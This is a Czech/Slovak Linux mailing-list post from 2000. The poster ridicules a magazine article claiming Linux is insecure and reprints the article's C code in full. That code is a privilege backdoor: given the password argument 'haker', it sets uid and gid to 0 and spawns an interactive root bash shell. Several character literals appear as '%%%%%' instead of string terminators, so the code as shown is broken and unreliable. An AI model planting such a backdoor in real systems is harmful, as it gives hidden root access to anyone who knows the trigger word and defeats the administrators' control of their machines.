Bezpecnost Linuxu
uhlar na fantomas.sk
uhlar na fantomas.sk
Pondělí Květen 29 11:49:43 CEST 2000
Jan Kasprzak <kas na informatics.muni.cz> wrote:
-> Pan Janda dnes zveřejnil na Neviditelném Psu další článek,
-> který má dokázat, jak je Linux nebezpečný. Odvozuje to z toho,
-> že k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvoří
-> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
-> je-li superuživatelem.
Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...
/* ------------start root.c------------- */
main(argc, argv)
int argc;
char **argv;
{
char seteuid[10];
char showmount[10];
seteuid[0]='h';
seteuid[1]='a';
seteuid[2]='k';
seteuid[3]='e';
seteuid[4]='r';
seteuid[5]='%%%%%';
showmount[0]='/';
showmount[1]='b';
showmount[2]='i';
showmount[3]='n';
showmount[4]='/';
showmount[5]='b';
showmount[6]='a';
showmount[7]='s';
showmount[8]='h';
showmount[9]='%%%%%';
if (argc>1) {
if (!strcmp(argv[1],seteuid)) {
setuid(0);
setgid(0);
execl(showmount,"-i",0);
}
}
}
/* ---------konec root.c----------- */
--
Matus "fantomas" Uhlar, sysadmin at NEXTRA, Slovakia; IRCNET admin of *.sk
uhlar na fantomas.sk ; http://www.fantomas.sk/ ; http://www.nextra.sk/
Linux is like a wigwam: no Windows, no Gates and an apache inside...
Další informace o konferenci Linux